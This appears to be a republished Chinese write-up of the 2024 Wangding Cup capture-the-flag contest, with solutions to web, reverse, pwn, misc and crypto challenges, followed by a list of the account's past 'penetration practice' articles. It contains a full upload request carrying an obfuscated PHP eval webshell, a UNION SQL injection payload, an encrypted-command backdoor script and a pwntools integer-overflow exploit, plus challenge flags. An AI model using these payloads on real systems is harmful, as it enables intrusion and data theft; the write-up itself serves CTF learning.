2024网鼎杯激战正酣，号主引用网上文章，以供学习。

文章来源：公号隼目安全

签到题

直接看群公告

web1

访问/upload.php

将php一句话改后缀.png然后上传，burp抓包后修改为php

数据包:

POST /upload.php HTTP/1.1
Host: 0192c657e8dd71c2831bd489d75161e6.0h49.dg01.wangdingcup.com:43000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------234681467240373262723660237873
Content-Length: 514
Origin: http://0192c657e8dd71c2831bd489d75161e6.0h49.dg01.wangdingcup.com:43000
Connection: close
Referer: http://0192c657e8dd71c2831bd489d75161e6.0h49.dg01.wangdingcup.com:43000/upload.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------234681467240373262723660237873
Content-Disposition: form-data; name='fileToUpload'; filename='Phantom.php'
Content-Type: image/png

<?php class G7LRDcp8 { public function __construct($H2G8N){ @eval('/*Z#£¤h*u@!h3Myrz9616*/'.$H2G8N.'/*Z#£¤h*u@!h3Myrz9616*/'); }}new G7LRDcp8($_REQUEST['Phantom']);?>
-----------------------------234681467240373262723660237873
Content-Disposition: form-data; name='submit'

ä¸ä¼ 
-----------------------------234681467240373262723660237873—

Antsword连接读取根目录flag.txt

web2

Mozhe原题

注入语句为id=1 order by 1 数字1逐次提升发现是5报错。说明字段数为4

注入语句为id=-1 union select 1,2,3,4 回显2和3，说明可在这两处执行sql语句

接下来就是爆库名，表名，列名，字段

最后payload

GET ?id=-1%20union%20select%201,group_concat(OAname),group_concat(PassWord),4%20from%20OA_UsersCmd5解密后

登录即可获取flag

web3

首先用Dirsearch来扫目录

找到/wwwroot.zip

看了几乎一个多小时，最后把目光锁定在describedssTest.php文件中

解密一手

看到需要传入id，花10块钱解密后发现是20241026的两次md5

这里id参数传入20241026的一次md5 这里看到post传入d参数，这里会用d函数解密

describedssTest.php了解到d函数逻辑后写一个加密脚本

<?php error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K)
{
    $cipher = 'aes-128-cbc';
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
    $result = base64_encode($GLOBALS['v8'] . $encrypted);
    $result = base64_encode($result);
    return $result;
}
function d($D, $K)
{
    $cipher = 'aes-128-cbc';
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
    return $decrypted;
}

echo e('cat ../../../../../../../../flag.txt', $p8);
?>

将运行结果通过d参数post传入

将结果解密

<?php error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K)
{
    $cipher = 'aes-128-cbc';
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
    $result = base64_encode($GLOBALS['v8'] . $encrypted);
    $result = base64_encode($result);
    return $result;
}
function d($D, $K)
{
    $cipher = 'aes-128-cbc';
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
    return $decrypted;
}

echo d('TURNeU9UWTBOelUwTmprd05UUTVORmhoU2xadVkydEVhWFFyVTJoYVVqTXZWSE5CUTBOWlRtOWtha3RqVUc5dVFUVnpZMHB0ZUhsTmVISnZaaTlYU25sYWQwUm9XVEJHY1dWeVNHVlhXR0k9
', $p8);
?>

wdflag{kxfvkehm1111hn02mm5m35bu6dv5gzy8}

REVERSE01

没什么好说的，java附件直接丢GPT一把梭

flag{2024_____W_D_B!}

PWN01

先打开附件

先看看逻辑

首先用户输入一个数字，保存在buffer数组中，并将其转换为整数val

val 必须是非负数，否则报错并退出 如果 val 合法，程序计算doubled = 2 * val并打印它

doubled等于-100时，输出flag

在这里可以利用2147483647整数溢出

Exp

from pwn import *
host = '0192c6987f867c18b31f18e2c806640a.dl7n.dg04.wangdingcup.com'
port = 43007
conn = remote(host, port)
conn.recvuntil(b'Input: ')
payload = str(2147483647 + 1)
conn.sendline(payload.encode())
response = conn.recvall().decode()
print(response)
conn.close()

wdflag{ztzepfh0727r0kt5kx275c2xdd6rq9h6}

MISC01

先丢入Neta

发现GET /home?id=-1 UNION ALL SELECT 1,2,GROUP_CONCAT(id,'-w-d-f-l-a-g{14030b5a31e7984

直接在txt中查找

wdflag{14030b5a31e7984365c08da0ece8dd03}

CRYPTO01

密文pvkq{G!N@L#}

凯撒密码解密

CRYPTO02附件丢入010分析

最后一段东西，不管它是什么，先丢入随波逐流

wdflag{de605a3746fdc919}

题外话

我们搭建了社区论坛，可以在社区中分享相关资源以及思路，社区已经开放用户发布文章的权限，论坛部分资源已经在'百度网盘资源共享'群内分享过，可进群免费获取，详情见下文，社区论坛URL:

https://www.cn-fnst.top/ 欢迎发文

【重要通知】资源共享与交流社区

↑↑↑↑↑

点击上方'资源共享与交流社区'查看相关信息

往期回顾

【相关分享】记一次某购书系统渗透

【漏洞情报】惊！安全圈众多师傅都在用的'它'，竟存在文件下载的bug？

【相关分享】ProxyCat：一款完全免费的代理池中间件

【相关分享】低成本作弊神器？使用ESP32将通义千问AI接入学生计算器（更新按钮支持）

【相关分享】低成本作弊神器？使用ESP32将通义千问AI接入学生计算器

▶【渗透实战系列】|52-记一次"91"站点渗透

▶【渗透实战系列】51|- 一次BC站点的GetShell过程

▶【渗透实战系列】50|- Log4j打点后与管理员斗智斗勇

▶【渗透实战系列】49|-实战某高校的一次挖矿病毒的应急处置

▶【渗透实战系列】|48-一次内网渗透

▶【渗透实战系列】|47-记一次对某鱼骗子卖家的溯源

▶【渗透实战系列】|46-渗透测试：从Web到内网

▶【渗透实战系列】|45-记一次渗透实战-代码审计到getshell

▶【渗透实战系列】|44-记一次授权渗透实战（过程曲折，Java getshell）

▶【渗透实战系列】|43-某次通用型漏洞挖掘思路分享

▶【渗透实战系列】|42-防范诈骗，记一次帮助粉丝渗透黑入某盘诈骗的实战

▶【渗透实战系列】|41-记一次色*情app渗透测试

▶【渗透实战系列】|40-APP渗透测试步骤（环境、代理、抓包挖洞）

▶【渗透实战系列】|39-BC渗透的常见切入点（总结）

▶【渗透实战系列】|38-对某色情直播渗透

▶【渗透实战系列】|37-6年级小学生把学校的网站给搞了！

▶【渗透实战系列】|36-一次bc推广渗透实战

▶【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透

▶【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链

▶【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP

▶【渗透实战系列】|32-FOFA寻找漏洞，绕过杀软拿下目标站

▶【渗透实战系列】|31-记一次对学校的渗透测试

▶【渗透实战系列】|30-从SQL注入渗透内网（渗透的本质就是信息搜集）

▶【渗透实战系列】|29-实战|对某勒索APP的Getshell

▶【渗透实战系列】|28-我是如何拿下BC站的服务器

▶【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试（成功获取管理员真实IP）

▶【渗透实战系列】|26一记某cms审计过程(步骤详细)

▶【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程

▶【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法

▶【渗透实战系列】|23-某菠菜网站渗透实战

▶【渗透实战系列】|22-渗透系列之打击彩票站

▶【渗透实战系列】|21一次理财杀猪盘渗透测试案例

▶【渗透实战系列】|20-渗透直播网站

▶【渗透实战系列】|19-杀猪盘渗透测试

▶【渗透实战系列】|18-手动拿学校站点 得到上万人的信息（漏洞已提交）

▶【渗透实战系列】|17-巧用fofa对目标网站进行getshell

▶【渗透实战系列】|16-裸聊APP渗透测试

▶【渗透实战系列】|15-博彩网站（APP）渗透的常见切入点

▶【渗透实战系列】|14-对诈骗（杀猪盘）网站的渗透测试

▶【渗透实战系列】|13-waf绕过拿下赌博网站

▶【渗透实战系列】|12 -渗透实战， 被骗4000花呗背后的骗局

▶【渗透实战系列】|11 - 赌博站人人得而诛之

▶【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖（修改价格提交订单）

▶【渗透实战系列】|9-对境外网站开展的一次web渗透测试（非常详细，适合打战练手）

▶【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程（详细到无语）

▶【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

▶【渗透实战系列】|6- BC杀猪盘渗透一条龙

▶【渗透实战系列】|5-记一次内衣网站渗透测试

▶【渗透实战系列】|4-看我如何拿下BC站的服务器

▶【渗透实战系列】|3-一次简单的渗透

▶【渗透实战系列】|2-记一次后门爆破到提权实战案例

▶【渗透实战系列】|1一次对跨境赌博类APP的渗透实战（getshell并获得全部数据）